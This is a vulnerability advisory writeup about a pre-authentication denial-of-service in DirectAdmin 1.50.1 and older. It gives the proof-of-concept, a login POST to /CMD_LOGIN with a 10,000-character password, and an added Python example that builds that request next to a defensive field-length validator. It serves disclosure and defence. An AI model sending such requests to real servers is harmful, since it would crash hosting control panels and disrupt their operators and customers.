Amir, an Iranian security researcher, IEDB Team member and founder of IEDB/IrIsT.ir and Xssed.ir, has published a denial-of-service (DoS) vulnerability in the DirectAdmin ControlPanel software (http://www.directadmin.com). DirectAdmin is a web hosting control panel for the remote, web-based administration of multiple web servers.
The vulnerability affects DirectAdmin ControlPanel version 1.50.1 and older; the researcher reports that the problem is present in all versions of DirectAdmin. The login screen places no limit on the length of the password field, so an attacker can submit an arbitrarily long password, and doing so causes DirectAdmin to crash. The request needs no credentials, since the flaw is in the login form itself.
An attacker could script the attack (including as a distributed DoS from many clients) from the following proof-of-concept information:
POST /CMD_LOGIN HTTP/1.1
$POC = "A" * 10000 (the password field is set to a string of 10,000 'A' characters)
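The following Python is an added example, not code from the advisory or from DirectAdmin: it assembles the raw HTTP request the two lines above describe (POST to /CMD_LOGIN with a 10,000-byte password) and, alongside it, the kind of server-side length check that would reject such a request before it reaches the authentication code. The form field names "username", "password" and "referer", the example host name and the 256-byte limit are assumptions, not values taken from the page.

```python
# Added example (not from the advisory or DirectAdmin): build the oversized-password
# login request described in the advisory, and show a hardened length check.
# ASSUMPTIONS: form field names "username"/"password"/"referer", the 256-byte
# maximum and the host name are illustrative; the page gives only the path and
# the 10,000-character password.
from typing import Tuple
from urllib.parse import urlencode, parse_qs

LOGIN_PATH = "/CMD_LOGIN"   # endpoint named in the advisory
MAX_PASSWORD_LEN = 256      # assumed sane upper bound for a password field


def build_poc_request(host: str, password_len: int = 10000, username: str = "admin") -> bytes:
    """Return the raw HTTP/1.1 POST corresponding to the advisory's
    $POC = "A" * 10000 line: a form login whose password is password_len
    'A' characters. Nothing is sent; the bytes are returned for inspection."""
    body = urlencode({"username": username,
                      "password": "A" * password_len,
                      "referer": "/"})
    head = [
        f"POST {LOGIN_PATH} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
        "",
        "",
    ]
    # "\r\n".join(...) yields "...Connection: close\r\n\r\n" before the body.
    return ("\r\n".join(head) + body).encode("ascii")


def split_request(req: bytes) -> Tuple[bytes, bytes]:
    """Split a raw request into (headers, body) at the first blank line."""
    head, body = req.split(b"\r\n\r\n", 1)
    return head, body


def validate_login_form(body: bytes, max_password_len: int = MAX_PASSWORD_LEN) -> Tuple[bool, str]:
    """Hardened counterpart: bound every field the login handler will touch
    before any authentication logic runs. Returns (accepted, reason)."""
    fields = parse_qs(body.decode("ascii", errors="replace"), keep_blank_values=True)
    username = fields.get("username", [""])[0]
    password = fields.get("password", [""])[0]
    if not username:
        return False, "missing username"
    if len(password) > max_password_len:
        # Reject up front instead of handing an unbounded string to the
        # authentication code, which is where the reported crash occurs.
        return False, f"password too long ({len(password)} > {max_password_len})"
    return True, "ok"


if __name__ == "__main__":
    req = build_poc_request("directadmin.example")   # constructed host name
    head, body = split_request(req)
    print(head.decode())
    print(f"body length: {len(body)} bytes")
    print("validator says:", validate_login_form(body))
```

The validator bounds the field length rather than the whole request body on purpose: a Content-Length limit at the web server would also stop this specific proof of concept, but a per-field check inside the application is what protects the login handler regardless of how the request is framed.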
Links to details:
Amir also recently published a cross-site scripting vulnerability in DirectAdmin ControlPanel that lets an attacker suspend or unsuspend users.
Links to details:
Amir thanks the following:
- Bl4ck M4n
- Ramin Assadian
- Ramin Asadyan
- Moslem Haghighian
- And all my friends and all members of the Iedb.Ir Team
Websites & contacts: